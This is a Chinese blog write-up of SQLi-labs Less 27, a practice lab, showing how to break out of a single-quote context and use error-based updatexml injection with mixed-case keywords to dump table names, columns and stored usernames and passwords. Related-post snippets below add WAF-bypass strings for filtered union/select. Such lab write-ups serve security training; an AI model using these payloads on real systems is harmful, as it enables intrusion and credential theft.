SQL-labs的第27关——union和select被屏蔽 报错注入(Get)

已于 2023-08-04 16:10:42 修改
阅读量320 收藏
点赞数
文章标签: sql 数据库
于 2023-08-04 15:59:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73393033/article/details/132106554
版权

注意:该关的空格、注释也被屏蔽了。

1、判断闭合方式

输入语句

?id=1\

,返回页面如下:

我们发现返回的报错信息中在\号的后面跟着一个'号。这说明闭合方式是'。

2、爆破数据库名、用户名、版本

输入语句

?id=1' %26%26 updatexml(1,concat('~',database(),user(),version(),'~'),1) %26%26 '1'='1

,返回页面如下:

3、爆破数据表名

输入语句

?id=1' %26%26 updatexml(1,concat('~',(sElect (group_concat(table_name)) from (information_schema.tables) where (table_schema=database())),'~'),1) %26%26 '1'='1

,返回页面如下:

4、爆破字段名

输入语句

?id=1' %26%26 updatexml(1,concat('~',(sElect (group_concat(column_name)) from (information_schema.columns) where (table_schema=database()) %26%26 (table_name='users')),'~'),1) %26%26 '1'='1

,返回页面如下:

5、爆破字段内容

输入语句

?id=1' %26%26 updatexml(1,concat('~',(sElect (group_concat(concat(id,'~',username,'~',password))) from (users)),'~'),1) %26%26 '1'='1

,返回页面如下:

我们发现显示的内容不完全,我们将语句改为:

?id=1' %26%26 updatexml(1,concat('~',mid((sElect (group_concat(concat(id,'~',username,'~',password))) from (users)),30,31),'~'),1) %26%26 '1'='1

,返回内容如下:

到此打靶结束

Hacker-小胖锅
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
免费的工具包,下载安装配置好即可使用,给个小赞吧。
Sqlilabs-27
KAKA的博客
07-14 788
题目告诉我们本卡过滤了 unionselect,其实还有空格,这一也过滤了 尝试双写绕过,不行 那就大小写绕过,成功 –查表 http://sqlilabs/Less-27/?id=1'and(extractvalue(1,concat(0x7e,(SeLect(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),0x7e)))and'1'='1 –查列 http://s.
(手工)【sqli-labs27、27a】回显、布尔盲注、过滤后注入
07-13 771
【SQL-、布尔、过滤】
SQLi LABS Less 27 联合注入+注入+布尔盲注+时间盲注
热门推荐
wangyuxiang946的博客
08-15 1万+
SQLi 第二十七,SQLi-LABS Less-27,SQLi-LABS Less 27,SQLiLABS Less27,SQLi Less 27
sql注入中过滤键字(union select等等)
没事我溜达
03-15 8319
今天来学习一下注入键字被过滤了该如何解决 打开靶场,这是我本地搭建的一个靶场所以没有靶场地址 我们在输入框内输入一个1 查询一下结果。 尝试闭合和注释,发现单引号即可完成闭合,--+作为注释内容,通过order by查询列数 看到页面上方order的or被过滤,说明or即是键词,我们双写or,变成 oorrder by 2 (一定要在or的中间双写or,不然两个都会被注释掉) 通过order by发现只有两列数据,那么开始联合注入 ...
SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注
wangyuxiang946的博客
08-15 1万+
SQLi 第27a,SQLi-LABS Less-27a,SQLi-LABS Less 27a,SQLiLABS Less27a,SQLi Less 27a
sql注入 自学笔记 注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
sql注入 自学笔记 注入 二阶注入 布尔时间盲注 基于sqli-labs
sql-labs技巧
03-01
SQL注入常用靶场的通技巧
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
sqlilabs过手册注入天书,过sqlliabs的绝佳手册
06-28
Sqli-labs安装需要安装以下环境 apache+mysql+php Sqli-labs安装 将之前下载的源码解压到web目录下,linux的apache为 /var/www/html下,windows下的wamp解压在www目录下。 修改sql-connections/db-creds.inc文件当中...
sql注入21-27
qq_45751902的博客
04-01 3044
21 经过这两个可知,有加密,在网上找大佬的解法说,使用了base64加密 解密后 base64编解码地址: https://tool.oschina.net/encrypt?type=3 可以推出,我们需要在burp suite上将编码后的内容输入 ') and updatexml(1,concat(0x7e,database(),0x7e),1)# ') union select 1,2, updatexml(1,concat(0x7e,database(),0x7e),1)# 同时因为有回
sqli-labs第二十七二十七a
m0_73248913的博客
02-22 144
sqlilabs第二十七二十七a
SQL注入绕过键词过滤的小技巧及原理(union select为例)
weixin_54848371的博客
09-22 1万+
本文以联合查询键字union select为例讲解绕过键词过滤的一些方法。之所以了解绕过,键是发现sqlmap有时候真的是不靠谱,只能指定命令跑。有一些简单过滤很容易绕过却不能检测。虽然麻烦点,手工yyds~~。 1、大小写变种 UNION SELECT=>uNIon SElecT 选择几个字母变换大小写,可以绕过部分不太聪明的过滤器。在sql查询中是不区分大小写的所以查询语句正常执行 2、使用SQL注释 union select=>/**/UNION/**/...
sqli-labs(27)
weixin_30901729的博客
05-28 427
0X01 先查询闭合 ?id=1' ?id=1'' 正确 知道是’的闭合语句 0X02那么开始我们的注入之旅 空格过滤了 尝试一下%0a绕过 #也被过滤了 那么用and '1'='1构造闭合 ?id=1'||'1'='1 显示正确 我们来爆一下数据名称 哦豁 union select 被过滤了 /?id=1'%0Aunion%0Asel...
SQL-labs的第28a——unionselect屏蔽 union联合查询攻击(Get
qq_73393033的博客
08-04 90
这说明该网站有三个返回位。接下来我们看看这三个返回位中哪几个是回显位。由此我们可以知道第2和3个返回位是回显位。
SQL注入绕过select过滤
qq_43596950的博客
03-25 4401
原题目出自攻防世界收录的2019强网杯,官网已有writer up,此博文仅个人的做题笔记 原题目链接:adworld.xctf.org.cn select被过滤可以考虑使用show显示表名和列名 http://ip:port/?inject= ';show databases;show tables;show columns from table; alter更改表名,利用源代码中的select进行查询 alter语句: ALTER TABLE 表名 CHANGE COLUMN 列名 【新】列名
9-Web安全——SQL注入WAF绕过之selectunion过滤
网络安全
06-03 9782
1. selectunion过滤绕过 真实的注入环境中一般无法通过网站的源代码进行安全审计的,那么在注入过程中我们就需要使用常见的SQL注入绕过技巧来帮助我们进行绕过WAF。 首先需要判断网页的注入类型,输入参数?id=1%0Aand%0A1=2,测试URL为: http://www.sqli.com/Less-27/?id=1%0Aand%0A1=2 页面返回的结果如下: 当我们输入id=1 and 1=2时,页面还是正常返回,说明这是一个字符型注入。 然...
sql注入绕过union select过滤
ncafei的博客
03-12 9705
#WAF Bypassing Strings: /*!%55NiOn*/ /*!%53eLEct*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SEL
SQL注入遇到过滤,二次注入
最新发布
qq_61412565的博客
08-13 933
SQL注入总不能一帆风顺,对面有时候会有一些防御,过安全狗宝塔那些先且不谈,就是过滤注释符号的时候。(新注意到一个知识点,get传参有urf编码,而post没有)应对方法有:因为注释符不起效,所以灵活用or,构造 or '1' ='1,来把后面的’给过滤掉,(但这是知道靶场源码做出来的方式,实战怎么搞呢)。上面一步是默认把字符型数字型测出来了,那么要记得该测列数和回显位了(这里居然忘了该有这步,真是不器用),以前常规的做法是 and order by 1234,这样不停换数字看他的嘛。
sql-labs第24二次注入
07-28
对于 SQL-Labs 第 24 的二次注入,你可以尝试以下步骤来完成任务: 1. 理解目标:首先,你需要了解任务的目标是什么。二次注入通常发生在用户输入被直接拼接到 SQL 查询语句中的情况。了解目标有助于你确定注入点...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hacker-小胖锅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值